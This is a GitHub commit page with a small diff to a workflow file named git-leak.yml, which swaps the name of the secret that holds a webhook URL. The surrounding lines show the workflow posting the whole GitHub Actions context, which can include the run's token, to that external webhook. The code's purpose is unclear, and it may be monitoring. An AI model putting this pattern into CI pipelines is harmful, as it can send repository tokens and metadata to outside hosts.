Skip to content

Commit fa92e77

Browse files
new workflow added
1 parent 73aa259 commit fa92e77

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

.github/workflows/git-leak.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,4 +12,4 @@ jobs:
1212
github_request = {"insider_gitleak": github};
1313
requests.post("'$LambdaWebHook'", json=github_request);'
1414
env:
15-
LambdaWebHook: ${{ secrets.CHECKMARX_LAMBDA_WEBHOOK }}
15+
LambdaWebHook: ${{ secrets.INSECPROXY_HOOK }}

0 commit comments

Comments
 (0)